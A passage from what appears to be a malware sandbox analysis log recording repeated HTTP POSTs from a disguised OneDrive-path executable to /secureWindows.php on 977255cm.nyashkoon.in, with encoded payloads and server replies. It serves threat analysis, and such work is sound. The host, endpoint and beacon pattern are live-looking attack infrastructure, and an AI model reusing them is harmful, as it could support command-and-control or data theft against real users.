                                                        Data Ascii: RTYRUZVVXWPYU^[]TX\XY]ZX]YX^S^URCERRPWR]]WSZRYPBZ\][_WQSUR[]WYY[^QX^TXUTYV^ZZPYVTXTWV@TYSWVTFZ[T[_XQX^YY[]Z\]T\\^]Y^_[Q[VX[R[TB_ZUU^^__YBQYT^DXTT\\\V_^]_WZQ[@UTZZTTSRUV]\RYX_T_[_\^\Q_R%[8>^(;"\0>;@96<\%<-)?4#\%(<&)]&8.: F$,Z*=
                                                        Oct 30, 2024 05:24:03.256624937 CET25INHTTP/1.1 100 Continue
                                                        Oct 30, 2024 05:24:03.449671984 CET796INHTTP/1.1 200 OK
                                                        Date: Wed, 30 Oct 2024 04:24:03 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mXTH8dWGt0TQhn56nAZh%2Fh77mPKHFrXfgF4tM5Dqa1UoDwSjQ5%2Fwpy%2BOxAeqSLiQRTeeQwdQ5UuQ73aiV%2F7VdoFS7aeS%2FeL1ukLEqsvI%2FKhFWfnBlcWO%2BDmcBHUM8wsoftiBA4al%2BKU%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8da8a22bfd0d475b-DFW
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1074&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1386&delivery_rate=1278022&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 34 0d 0a 33 57 5f 59 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 43W_Y0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        137192.168.2.450140188.114.96.3807760C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe
                                                        TimestampBytes transferredDirectionData
                                                        Oct 30, 2024 05:24:03.577465057 CET310OUTPOST /secureWindows.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                        Host: 977255cm.nyashkoon.in
                                                        Content-Length: 1076
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Oct 30, 2024 05:24:03.990916014 CET1076OUTData Raw: 57 56 5c 5d 55 59 53 50 58 57 50 59 55 5c 5b 5c 54 5b 5c 5b 59 53 5a 5d 5d 59 58 5e 53 5e 55 52 43 45 52 52 50 57 52 5d 5d 57 53 5a 52 59 50 42 5a 5c 5d 5b 5f 57 51 53 55 52 5b 5d 57 59 59 5b 5e 51 58 5e 54 58 55 54 59 56 5e 5a 5a 50 59 56 54 58
                                                        Data Ascii: WV\]UYSPXWPYU\[\T[\[YSZ]]YX^S^URCERRPWR]]WSZRYPBZ\][_WQSUR[]WYY[^QX^TXUTYV^ZZPYVTXTWV@TYSWVTFZ[T[_XQX^YY[]Z\]T\\^]Y^_[Q[VX[R[TB_ZUU^^__YBQYT^DXTT\\\V_^]_WZQ[@UTZZTTSRUV]\RYX_T_[_\^\Q_R%,&=893>89%&;/)( :+Z&#)%"'8:9 F$,Z*5


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        138192.168.2.450141188.114.96.3807760C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe
                                                        TimestampBytes transferredDirectionData
                                                        Oct 30, 2024 05:24:04.159600973 CET310OUTPOST /secureWindows.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                        Host: 977255cm.nyashkoon.in
                                                        Content-Length: 1340
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Oct 30, 2024 05:24:04.511727095 CET1340OUTData Raw: 52 50 5c 5d 55 54 53 57 58 57 50 59 55 5f 5b 5b 54 59 5c 5c 59 50 5a 5c 5d 59 58 5e 53 5e 55 52 43 45 52 52 50 57 52 5d 5d 57 53 5a 52 59 50 42 5a 5c 5d 5b 5f 57 51 53 55 52 5b 5d 57 59 59 5b 5e 51 58 5e 54 58 55 54 59 56 5e 5a 5a 50 59 56 54 58
                                                        Data Ascii: RP\]UTSWXWPYU_[[TY\\YPZ\]YX^S^URCERRPWR]]WSZRYPBZ\][_WQSUR[]WYY[^QX^TXUTYV^ZZPYVTXTWV@TYSWVTFZ[T[_XQX^YY[]Z\]T\\^]Y^_[Q[VX[R[TB_ZUU^^__YBQYT^DXTT\\\V_^]_WZQ[@UTZZTTSRUV]\RYX_T_[_\^\Q_R%,0<"';D:+&'/ \7:2)3<:385- F$,Z*
                                                        Oct 30, 2024 05:24:04.757013083 CET25INHTTP/1.1 100 Continue
                                                        Oct 30, 2024 05:24:04.967663050 CET940INHTTP/1.1 200 OK
                                                        Date: Wed, 30 Oct 2024 04:24:04 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Ir8geoBF6CMTIv%2B9FtGTjIowo45urS7jmlNL0X7bt9lt37Zht2EeWrhdWmUzUSX4DAjWv2qGZU1kcMqk4RGQO06XE%2FGbVzk9%2BC%2FoBFSpbCbdptx%2BfoddfwtXoj2PhL%2FIMEoQT80EK6I%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8da8a2356c83464a-DFW
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1768&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1650&delivery_rate=785675&cwnd=251&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 39 38 0d 0a 01 1f 26 13 2b 16 01 0f 25 0a 26 5b 3c 3c 00 07 3d 2e 0c 5d 24 1f 02 15 31 05 2e 5a 2a 3b 05 58 3e 42 24 5a 3f 32 23 00 34 26 33 02 3e 01 2f 46 0c 10 24 01 26 22 33 52 3f 55 2d 58 3d 3b 38 05 23 1e 31 05 3e 00 2c 0e 36 0a 37 07 26 31 3e 1e 38 2d 3e 54 2d 1b 21 01 2d 23 09 0d 2a 2a 21 57 08 14 21 03 31 02 01 16 32 2d 38 5f 26 1c 2e 11 37 01 01 5c 36 2b 35 03 28 2b 09 0d 25 20 12 12 30 55 30 0f 25 5f 3c 15 2b 21 02 0c 27 23 22 52 2e 0d 20 56 03 32 58 53 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 98&+%&[<<=.]$1.Z*;X>B$Z?2#4&3>/F$&"3R?U-X=;8#1>,67&1>8->T-!-#**!W!12-8_&.7\6+5(+% 0U0%_<+!'#"R. V2XS0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        139192.168.2.450142188.114.96.3807760C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe
                                                        TimestampBytes transferredDirectionData
                                                        Oct 30, 2024 05:24:04.296758890 CET310OUTPOST /secureWindows.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                        Host: 977255cm.nyashkoon.in
                                                        Content-Length: 1076
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Oct 30, 2024 05:24:04.652276039 CET1076OUTData Raw: 57 53 5c 54 55 5f 56 5d 58 57 50 59 55 5e 5b 58 54 58 5c 5a 59 54 5a 54 5d 59 58 5e 53 5e 55 52 43 45 52 52 50 57 52 5d 5d 57 53 5a 52 59 50 42 5a 5c 5d 5b 5f 57 51 53 55 52 5b 5d 57 59 59 5b 5e 51 58 5e 54 58 55 54 59 56 5e 5a 5a 50 59 56 54 58
                                                        Data Ascii: WS\TU_V]XWPYU^[XTX\ZYTZT]YX^S^URCERRPWR]]WSZRYPBZ\][_WQSUR[]WYY[^QX^TXUTYV^ZZPYVTXTWV@TYSWVTFZ[T[_XQX^YY[]Z\]T\\^]Y^_[Q[VX[R[TB_ZUU^^__YBQYT^DXTT\\\V_^]_WZQ[@UTZZTTSRUV]\RYX_T_[_\^\Q_R%;2_=+>'=E-6 1=/[7*?Y2*<<5)'85Y-: F$,Z*=
                                                        Oct 30, 2024 05:24:04.902230978 CET25INHTTP/1.1 100 Continue
                                                        Oct 30, 2024 05:24:05.107672930 CET788INHTTP/1.1 200 OK
                                                        Date: Wed, 30 Oct 2024 04:24:05 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RzejTsXHRpc%2Br3OlNxn%2BGkMzaWH6O%2FLqujaIC3T71YPRVavDXvHqXyGequ8TBs5OPvAhPSz0p6paQbWqfgQmESj7yIex%2BXLWO68sxJGmNesh7xhO9TGB8FPJgG7ZCM7jHmcScHc7WQs%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8da8a2364c362cda-DFW
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1377&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1386&delivery_rate=1078986&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 34 0d 0a 33 57 5f 59 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 43W_Y0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        140192.168.2.450143188.114.96.3807760C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe
                                                        TimestampBytes transferredDirectionData
                                                        Oct 30, 2024 05:24:05.231933117 CET286OUTPOST /secureWindows.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                        Host: 977255cm.nyashkoon.in
                                                        Content-Length: 1076
                                                        Expect: 100-continue
                                                        Oct 30, 2024 05:24:05.590154886 CET1076OUTData Raw: 57 5e 59 50 55 58 56 51 58 57 50 59 55 5a 5b 5c 54 5a 5c 5b 59 55 5a 54 5d 59 58 5e 53 5e 55 52 43 45 52 52 50 57 52 5d 5d 57 53 5a 52 59 50 42 5a 5c 5d 5b 5f 57 51 53 55 52 5b 5d 57 59 59 5b 5e 51 58 5e 54 58 55 54 59 56 5e 5a 5a 50 59 56 54 58
                                                        Data Ascii: W^YPUXVQXWPYUZ[\TZ\[YUZT]YX^S^URCERRPWR]]WSZRYPBZ\][_WQSUR[]WYY[^QX^TXUTYV^ZZPYVTXTWV@TYSWVTFZ[T[_XQX^YY[]Z\]T\\^]Y^_[Q[VX[R[TB_ZUU^^__YBQYT^DXTT\\\V_^]_WZQ[@UTZZTTSRUV]\RYX_T_[_\^\Q_R%/32X+^13>'E:C#&-,/*#(19/]($:: F$,Z*-
                                                        Oct 30, 2024 05:24:05.836293936 CET25INHTTP/1.1 100 Continue
                                                        Oct 30, 2024 05:24:06.040776968 CET794INHTTP/1.1 200 OK
                                                        Date: Wed, 30 Oct 2024 04:24:05 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mWwznJ97VC909ntrruW%2B2Gl7SXR%2BQ5mY5okrvaR9tywNe1wMpeR9Zpu2zXsBv4sbn%2Ff3M5%2BbRzp%2FhiBShwoSQ%2BceCRHsUuPB%2BJS1FGMwfdxheN4qxqcUgeW4ImUAKqv7qBicSl4tixc%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8da8a23c1bcd2847-DFW
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1347&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1362&delivery_rate=1144664&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 34 0d 0a 33 57 5f 59 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 43W_Y0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        141192.168.2.450144188.114.96.3807760C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe
                                                        TimestampBytes transferredDirectionData
                                                        Oct 30, 2024 05:24:06.175977945 CET310OUTPOST /secureWindows.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                        Host: 977255cm.nyashkoon.in
                                                        Content-Length: 1076
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Oct 30, 2024 05:24:06.527570963 CET1076OUTData Raw: 52 52 59 55 55 5c 56 52 58 57 50 59 55 5e 5b 53 54 52 5c 5d 59 5c 5a 5e 5d 59 58 5e 53 5e 55 52 43 45 52 52 50 57 52 5d 5d 57 53 5a 52 59 50 42 5a 5c 5d 5b 5f 57 51 53 55 52 5b 5d 57 59 59 5b 5e 51 58 5e 54 58 55 54 59 56 5e 5a 5a 50 59 56 54 58
                                                        Data Ascii: RRYUU\VRXWPYU^[STR\]Y\Z^]YX^S^URCERRPWR]]WSZRYPBZ\][_WQSUR[]WYY[^QX^TXUTYV^ZZPYVTXTWV@TYSWVTFZ[T[_XQX^YY[]Z\]T\\^]Y^_[Q[VX[R[TB_ZUU^^__YBQYT^DXTT\\\V_^]_WZQ[@UTZZTTSRUV]\RYX_T_[_\^\Q_R%/0=<9$>8,%/1-/##X&'(69['^*/: F$,Z*=
                                                        Oct 30, 2024 05:24:06.771384001 CET25INHTTP/1.1 100 Continue
                                                        Oct 30, 2024 05:24:06.966308117 CET790INHTTP/1.1 200 OK
                                                        Date: Wed, 30 Oct 2024 04:24:06 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BC5xJm1oDjg3%2FSINThje083xHX07sHxw4rlf%2BVUtszBbryCyCC6%2FH0CFyueQBfRIj4m3PPj9YjWS0tUH%2FSmYvJREBbzklHEJ1y47LSogoYnJGbKV1ft%2BAaWsGPGW5n0O3R0FdWWksI4%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8da8a241fe37e70e-DFW
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1549&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1386&delivery_rate=1082212&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 34 0d 0a 33 57 5f 59 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 43W_Y0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        142192.168.2.450145188.114.96.3807760C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe
                                                        TimestampBytes transferredDirectionData
                                                        Oct 30, 2024 05:24:07.090485096 CET310OUTPOST /secureWindows.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                        Host: 977255cm.nyashkoon.in
                                                        Content-Length: 1076
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Oct 30, 2024 05:24:07.452671051 CET1076OUTData Raw: 57 5f 5c 53 50 5e 53 51 58 57 50 59 55 5f 5b 5c 54 58 5c 5d 59 53 5a 54 5d 59 58 5e 53 5e 55 52 43 45 52 52 50 57 52 5d 5d 57 53 5a 52 59 50 42 5a 5c 5d 5b 5f 57 51 53 55 52 5b 5d 57 59 59 5b 5e 51 58 5e 54 58 55 54 59 56 5e 5a 5a 50 59 56 54 58
                                                        Data Ascii: W_\SP^SQXWPYU_[\TX\]YSZT]YX^S^URCERRPWR]]WSZRYPBZ\][_WQSUR[]WYY[^QX^TXUTYV^ZZPYVTXTWV@TYSWVTFZ[T[_XQX^YY[]Z\]T\\^]Y^_[Q[VX[R[TB_ZUU^^__YBQYT^DXTT\\\V_^]_WZQ[@UTZZTTSRUV]\RYX_T_[_\^\Q_R%[/0Y((*]$/D-7$-#,*<Y4 1:+\?%:&;9.: F$,Z*
                                                        Oct 30, 2024 05:24:07.679929972 CET25INHTTP/1.1 100 Continue
                                                        Oct 30, 2024 05:24:07.894293070 CET791INHTTP/1.1 200 OK
                                                        Date: Wed, 30 Oct 2024 04:24:07 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=y4ZVoPTjXVZ8E2nh9%2BVb%2FZyujHlOTaE1ofCOs1Qv7EY2%2BZrgc9%2F1ifu%2BkT2Lh6o3KE5l8JR%2FI47ugxT1P8OOFVlViHKIWR6M1InNfIEwe1hDIw2UopvqEqkfd1o5m5Z0S2fGACh2tCM%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8da8a247aff7b78d-DFW
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1335&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1386&delivery_rate=1054624&cwnd=67&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 34 0d 0a 33 57 5f 59 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 43W_Y0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        143192.168.2.450146188.114.96.3807760C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe
                                                        TimestampBytes transferredDirectionData
                                                        Oct 30, 2024 05:24:08.015168905 CET310OUTPOST /secureWindows.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                        Host: 977255cm.nyashkoon.in
                                                        Content-Length: 1076
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Oct 30, 2024 05:24:08.371186018 CET1076OUTData Raw: 57 56 59 50 55 5c 53 56 58 57 50 59 55 5b 5b 5c 54 58 5c 5f 59 50 5a 5f 5d 59 58 5e 53 5e 55 52 43 45 52 52 50 57 52 5d 5d 57 53 5a 52 59 50 42 5a 5c 5d 5b 5f 57 51 53 55 52 5b 5d 57 59 59 5b 5e 51 58 5e 54 58 55 54 59 56 5e 5a 5a 50 59 56 54 58
                                                        Data Ascii: WVYPU\SVXWPYU[[\TX\_YPZ_]YX^S^URCERRPWR]]WSZRYPBZ\][_WQSUR[]WYY[^QX^TXUTYV^ZZPYVTXTWV@TYSWVTFZ[T[_XQX^YY[]Z\]T\\^]Y^_[Q[VX[R[TB_ZUU^^__YBQYT^DXTT\\\V_^]_WZQ[@UTZZTTSRUV]\RYX_T_[_\^\Q_R%[80%?.]'?.&<&8_/8] '[2Y<5:3+:. F$,Z*)
                                                        Oct 30, 2024 05:24:08.613293886 CET25INHTTP/1.1 100 Continue
                                                        Oct 30, 2024 05:24:08.930634975 CET788INHTTP/1.1 200 OK
                                                        Date: Wed, 30 Oct 2024 04:24:08 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DIoi7lf5f6X%2FSkbQNgqoep1rf8NrJSo9PjyAb5bK3wMS9RlN7HQd3ePHlEAT%2FCWGKIPcCoq12wcn1ck2s1ZrNX5V0jz7VVEi0%2FEoSWw%2BwijIvba4SADCAjrxFLsmcovzLeTuexHkC74%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8da8a24d7999e524-DFW
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1107&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1386&delivery_rate=1230246&cwnd=251&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 34 0d 0a 33 57 5f 59 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 43W_Y0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        144192.168.2.450147188.114.96.3807760C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe
                                                        TimestampBytes transferredDirectionData
                                                        Oct 30, 2024 05:24:09.059138060 CET310OUTPOST /secureWindows.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                        Host: 977255cm.nyashkoon.in
                                                        Content-Length: 1076
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Oct 30, 2024 05:24:09.419033051 CET1076OUTData Raw: 57 5f 59 57 55 55 53 51 58 57 50 59 55 5e 5b 5e 54 59 5c 5a 59 51 5a 5d 5d 59 58 5e 53 5e 55 52 43 45 52 52 50 57 52 5d 5d 57 53 5a 52 59 50 42 5a 5c 5d 5b 5f 57 51 53 55 52 5b 5d 57 59 59 5b 5e 51 58 5e 54 58 55 54 59 56 5e 5a 5a 50 59 56 54 58
                                                        Data Ascii: W_YWUUSQXWPYU^[^TY\ZYQZ]]YX^S^URCERRPWR]]WSZRYPBZ\][_WQSUR[]WYY[^QX^TXUTYV^ZZPYVTXTWV@TYSWVTFZ[T[_XQX^YY[]Z\]T\\^]Y^_[Q[VX[R[TB_ZUU^^__YBQYT^DXTT\\\V_^]_WZQ[@UTZZTTSRUV]\RYX_T_[_\^\Q_R%];2\(;2Y3+.%#1.3/98X#:':3<&:$(): F$,Z*=
                                                        Oct 30, 2024 05:24:09.678165913 CET25INHTTP/1.1 100 Continue
                                                        Oct 30, 2024 05:24:09.933211088 CET25INHTTP/1.1 100 Continue
                                                        Oct 30, 2024 05:24:09.933257103 CET788INHTTP/1.1 200 OK
                                                        Date: Wed, 30 Oct 2024 04:24:09 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4bjSAD0Fgm1y%2F0NkfIGRM2w5Tb76qKitP4Mo2n%2BA8rR1TqLBnVPm93vClONXL1lqkgHpoDDrPrLbn103u7xrc1PwAGt%2FQos1c6xTaQKvLmRXfagqUpRouBEYW8mzeeSe%2FnkWYbAqphQ%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8da8a2542f502cd4-DFW
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1433&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1386&delivery_rate=1038737&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 34 0d 0a 33 57 5f 59 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 43W_Y0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        145192.168.2.450148188.114.96.3807760C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe
                                                        TimestampBytes transferredDirectionData
                                                        Oct 30, 2024 05:24:09.988802910 CET310OUTPOST /secureWindows.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                        Host: 977255cm.nyashkoon.in
                                                        Content-Length: 1340
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        146192.168.2.450149188.114.96.3807760C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe
                                                        TimestampBytes transferredDirectionData
                                                        Oct 30, 2024 05:24:10.062053919 CET310OUTPOST /secureWindows.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                        Host: 977255cm.nyashkoon.in
                                                        Content-Length: 1076
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Oct 30, 2024 05:24:10.418000937 CET1076OUTData Raw: 57 57 5c 55 50 58 56 52 58 57 50 59 55 5e 5b 5d 54 5e 5c 58 59 56 5a 5a 5d 59 58 5e 53 5e 55 52 43 45 52 52 50 57 52 5d 5d 57 53 5a 52 59 50 42 5a 5c 5d 5b 5f 57 51 53 55 52 5b 5d 57 59 59 5b 5e 51 58 5e 54 58 55 54 59 56 5e 5a 5a 50 59 56 54 58
                                                        Data Ascii: WW\UPXVRXWPYU^[]T^\XYVZZ]YX^S^URCERRPWR]]WSZRYPBZ\][_WQSUR[]WYY[^QX^TXUTYV^ZZPYVTXTWV@TYSWVTFZ[T[_XQX^YY[]Z\]T\\^]Y^_[Q[VX[R[TB_ZUU^^__YBQYT^DXTT\\\V_^]_WZQ[@UTZZTTSRUV]\RYX_T_[_\^\Q_R&8"_+%'- 90\2?8'4:?1_+](%]':-: F$,Z*=
                                                        Oct 30, 2024 05:24:10.656299114 CET25INHTTP/1.1 100 Continue
                                                        Oct 30, 2024 05:24:10.880969048 CET788INHTTP/1.1 200 OK
                                                        Date: Wed, 30 Oct 2024 04:24:10 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AZOcW7kvNl%2FzNXcK9WyrOylcdcmMmRANjivZz3rQewqbmkNx02s%2BP1xoZL6yVGJBaO6aFxhE9VS2GTmBfO6LQyz5piWa3rqQ%2BwmMYqJgV8huD1jOTyMK453JavxBpSJ7O%2BB8IHQmeBA%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8da8a25a3ab783a4-DFW
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1089&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1386&delivery_rate=1330882&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 34 0d 0a 33 57 5f 59 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 43W_Y0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        147192.168.2.450150188.114.96.3807760C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe
                                                        TimestampBytes transferredDirectionData
                                                        Oct 30, 2024 05:24:11.017092943 CET286OUTPOST /secureWindows.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                        Host: 977255cm.nyashkoon.in
                                                        Content-Length: 1076
                                                        Expect: 100-continue
